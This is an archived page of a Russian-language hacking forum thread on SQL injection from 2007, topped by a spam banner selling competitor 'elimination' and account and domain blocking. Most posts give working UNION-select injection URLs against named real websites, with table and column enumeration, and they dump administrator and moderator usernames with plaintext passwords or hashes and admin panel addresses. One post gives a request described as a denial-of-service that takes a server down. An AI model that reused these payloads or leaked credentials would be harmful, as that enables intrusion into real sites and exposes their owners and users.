УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 377 из 1242

377

Опции темы

Поиск в этой теме

Опции просмотра

#3761

20.11.2007, 18:34

big_BRAT

Познающий

Регистрация: 24.12.2006

Сообщений: 90

Провел на форуме:
1292655

Репутация: 168

Отправить сообщение для big_BRAT с помощью ICQ

Цитата:

Сообщение от -=lebed=-

SQL-инъекция в HotScripts Clone Script
Как посмотреть остальных админов?
Почему запросы с limit и where не прокатывают?

Код:

_http://www.filelook.com/software-description.php?id=-1+union+select+concat(admin_name,char(58),pwd,char(58),id)+from+sbwmd_admin+limit+1,1/*
_http://www.filelook.com/software-description.php?id=-1+select+admin_name+from+sbwmd_admin+where+id=2/*

Дальше всё аналогично предыдущему примеру: к в админку не пускает, файлы читать,имхо, нет привилегий, limit,where не катят. В чём косяк?

я думаю нет там косяка, просто нету больше админов
1. _http://www.filelook.com/software-description.php?id=-1+union+select+count(admin_name)+from+sbwmd_admin/*
count возвращает кол 1

limit and order тоже работают
http://www.filelook.com/software-description.php?id=-1+union+select+concat(admin_name,char(58),pwd,char (58),id)+from+sbwmd_admin+limit+0,1/*
, такая же история и с "+where+id=1/*"

#3762

20.11.2007, 23:30

Tyc00n

Познающий

Регистрация: 13.01.2007

Сообщений: 96

Провел на форуме:
575156

Репутация: 50

Код:

http://www.1adruck.de/catalog/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*

Код:

http://www.patronen-markt.de/catalog/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*

Код:

http://www.hiddenstreamfarm.com/catalog-hsf/links.php?link_id=-999+union+select+1,2,user(),4,5,6,7,8,9/*

Код:

http://www.fitnesstienda.com/links.php?link_id=-999+union+select+1,2,3,4,5,6,7,8,9/*

Код:

http://www.ocioportal.net/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*

Код:

http://www.bibeloty.com.pl/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*

2-=lebed=-

#3763

21.11.2007, 00:39

5taY3r

Познающий

Регистрация: 10.05.2007

Сообщений: 38

Провел на форуме:
453576

Репутация: 100

2-=lebed=-

http://www.webmasters.org/ Здесь всё работает.................................. ..

Код:

http://www.webmasters.org/scripts/software-description.php?id=-1+union+select+1,2,concat(admin_name,char(58),pwd,char(58),id),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+sbwmd_admin/*

Админка:

Код:

http://www.webmasters.org/scripts/siteadmin/

admin:webmasters666:1

#3764

21.11.2007, 07:12

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

__Т__
НоВ

Код:

http://www.ntv.ru/corp/press/index.jsp?what=News&id=119720/**/and/**/(select/**/1/**/from/**/sys.dual)=1--

фильтруются пробелы, "$" и возможно другие символы
на самом деле инъекций там много, просто привел пример одной из них

может можно провести (почти уверен) инъекцию с помощью union select , но 56 раз null писать мне незахотелось

__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 21.11.2007 в 07:37..

#3765

21.11.2007, 11:08

fRg

Участник форума

Регистрация: 28.12.2006

Сообщений: 111

Провел на форуме:
500695

Репутация: 524

Отправить сообщение для fRg с помощью ICQ

Румыния. Продолжаем...

zf.ro

Код:

http://www.zf.ro/articol.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

5.0.21-log:zf:zf@127.0.0.1

Открытых таб не много, из них:

Код:

adminuserright
adminuserdomains
adminuser
adminroleview
adminrole
active_users
adminview

Поля в adminuser:

Код:

adminuser_uname
adminuser_name
adminuser_password
adminuser_level
adminuser_role

Некоторые данные из неё (uname : name : password):

Код:

mirela:mirela:marinela
vlad:Vlad Nicolaescu:samsung
Radu24:Radu ZF 24:zf24
elisa.mitroiu:Elisa Mitroiu:elemit
anca.teodorescu:Anca Teodorescu
и др.

Админка здесь _http://www.zf.ro/admin/, но зайти не получилось

magazinulprogresiv.ro

Код:

http://www.magazinulprogresiv.ro/stiri.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9/*

5.0.27-standard:trtro_mp:trtro_adminmp@localhost

30 таблиц - и ни одной интересной...
Разве что таба guestbook с сочитанием полей g_name и g_email

impreuna.arts.ro

Код:

http://www.impreuna.arts.ro/articol.php?limba=1&id_articol=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user())/*

4.1.22-standard-log:impreuna_impreuna:impreuna_root@localhost

efoto.ro

Код:

http://www.efoto.ro/articol.php?a=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10/*

4.1.22-standard-log:efoto_db:efoto_efoto@localhost

badorgood.com

Код:

http://www.badorgood.com/detailn.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*

4.1.22-standard-log:bog_BOG:bog_bog@localhost

parerea.com

Код:

http://parerea.com/articol.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12/*

4.1.22-standard : parereac_wrdp1 : parereac@localhost

#3766

21.11.2007, 11:51

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

СПОРТ\\\
телеканал

Код:

http://news.sportbox.ru/Vidy_sporta/billiard/results?browseCueist=340/**/union/*'*/select/**/1,TABLE_NAME,null,null,null,null,null,1,1,null,1,null,null%20from/**/INFORMATION_SCHEMA.TABLES--

Инъекция в POSTGRE
открываем ссылку, смотрим исходный код страницы, видим имена всех таблиц

__________________
Карфаген должен быть разрушен...

#3767

21.11.2007, 12:14

fRg

Участник форума

Регистрация: 28.12.2006

Сообщений: 111

Провел на форуме:
500695

Репутация: 524

Румыния

colectzii.ro

Код:

http://www.colectzii.ro/wiki.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/*

5.0.45-community-log:colectzi_main:colectzi_Robert@localhost

78 таблиц:

Код:

http://www.colectzii.ro/wiki.php?id=-1+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+77,1/*

Заинтересовали табы:

Код:

Emailz
Users
UsersIPs
UsersHideLics

В табе Users 50(!) полей:

Код:

ID,UserName,Psw,Email,Tel,DataNasterii,Oras,Adr1,Adr2,IP,LastLogin,Activated,Vanzari,Cumparari,DataCrearii,Nume,Prenume,Newsletter,ConfirmationCode,MSN,Y,ICQ,Profesie,Interese,Personal,Imagine,Level,Viewed,PunctePlus,PuncteMinus,Tokens,ReLic,ReLicSendMail,Recs,RecsLeft,LastVisit,PrevLogin,LastBirthdayMail,BlockMinNegativeEvals,IsOK,Web,WishWeb,NewMail,NewMailCode,WishOK,ChPswCode,Banned,ShowOnlyOK,AllowOnlyOK,PayPal

Админка здесь _http://www.colectzii.ro/login.php

Админы (логин:пасс):

Код:

Robert : bobi
Albert : stiutotul

#3768

21.11.2007, 13:25

~~otmorozok428~~

Banned

Регистрация: 19.10.2007

Сообщений: 152

Провел на форуме:
557623

Репутация: 415

Сайт

http://www.certification.ru

Он же

http://www.mcp.ru , http://www.ccna.ru , http://www.ccnp.ru , http://www.cna.ru , http://www.cne.ru и http://www.mcsd.ru.

http://www.certification.ru/cgi-bin/userinfo.cgi?x_offset=20'&x_limit=20&fio=&email=&n ick=&certs=&city=

Цитата:

ERROR: DBD::mysql::st execute failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', 20' at line 1 at
/www/ru.certification/w2api/modules/queries.pm line 44.
select * from users order by crating desc, fio limit 20', 20: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', 20' at line 1 at
/www/ru.certification/w2api/modules/queries.pm line 44.
String found where operator expected at (eval 15) line 1, at end of line (Missing operator before ?)
/www/ru.certification/cgi-bin/userinfo.cgi: parser, calculate line 328 [from = @@global.Offset@@ + 1]: Can't find string terminator "'" anywhere before EOF at (eval 15) line 1.
String found where operator expected at (eval 16) line 1, at end of line (Missing operator before ?)
/www/ru.certification/cgi-bin/userinfo.cgi: parser, calculate line 329 [till = @@global.Offset@@ + @@global.Limit@@]:
Can't find string terminator "'" anywhere before EOF at (eval 16) line 1.
Can't use an undefined value as a HASH reference at /www/ru.certification/cgi-bin/userinfo.cgi line 111.

FATAL ERROR:

http://www.mcp.ru/labmarket/searchresult.html?type=resu'me&scheme=sea_lab&sal1 =&sal2=&ospeciality=&city=&ocity=&spec=

Цитата:

—UT.Ђ)S..?UTadmintemplatesя™UTconfigА UT extentionsЯЎUTlabmarkettemplatesяўUT
mailtemplatesЂяЈUTmodulesЁUTordertemplatesя© UTpartnertemplatesЂячЂT templatesСЯшЂT
usertemplatesЂяцVTsuppliers.conf6нVT owner.confхVTШ shop.confцVTД.suppliers.conf.IX99lN

http://www.mcp.ru/labmarket/fullvacancy.html?id=10662+AND+VERSION()+like+'%' и т.д. подбором...

Версия "мускула": 4.1.14
Имя БД: certification
Имя пользователя БД: cert_localhost

В БД есть таблицы users и moderators.
Таблица users содержит поля: id, fio, login, city, nick, sex, url, icq, showemail, sendemail, birth, pos, workplace, certs.
Таблица moderators содержит поля: email, id, city, url.

Модераторские аккаунты:

Код:

adminx@yandex.ru:assa
xcosmic@gmail.com:JdsBPsQ

Просто "блатные" аккаунты:

Код:

lenka@education.ru:lenka
club@certification.ru:DPSrq]pH?7N({XRm>*7C
admin@xpoint.ru:q

http://www.mcp.ru/cgi-bin/forum.cgi?action=thread&id=26348+OR+1 - DOS-атака, сервак ложится надолго :-)

http://www.mcp.ru/admin/ - Админка

#3769

21.11.2007, 16:09

fRg

Участник форума

Регистрация: 28.12.2006

Сообщений: 111

Провел на форуме:
500695

Репутация: 524

Румыния

4x4.ro

Код:

http://www.4x4.ro/index-articol.php?sc=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user())/*

5.0.37:fourx4:dvautomedia@localhost

81 таблица:

Код:

http://www.4x4.ro/index-articol.php?sc=-1+union+select+1,2,table_name++from+information_schema.tables+limit+80,1/*

Наши таблицы:

Код:

pre_forum_user
gal2_User
useri

Поля таблицы useri:

Код:

email,login,parola,admin

Админ (логин:пасс):

Код:

body00:parola

#3770

21.11.2007, 16:46

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

Провел на форуме:
7215020

Репутация: 1423

http://www.sportfinder.ru/show_sites.php?query_type=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3/*

4.0.27-log/wushu/wushu@pm19.zenon.net

-------------------------------------------------------------------

sportal.by

http://sportal.by/menu.php?form_id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user())/*

5.0.22-Debian_2-log/sportalby/sportalby@localhost

http://sportal.by/menu.php?form_id=-1+union+select+1,2,concat_ws(0x2F,username,user_pa ssword,user_icq)+from+phpbb_users+limit+1,1/*

логин/хеш/уин
admin/828a4b79b3ad488d3181abe23c44e7d2/

Страница 377 из 1242

377

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)

Быстрый переход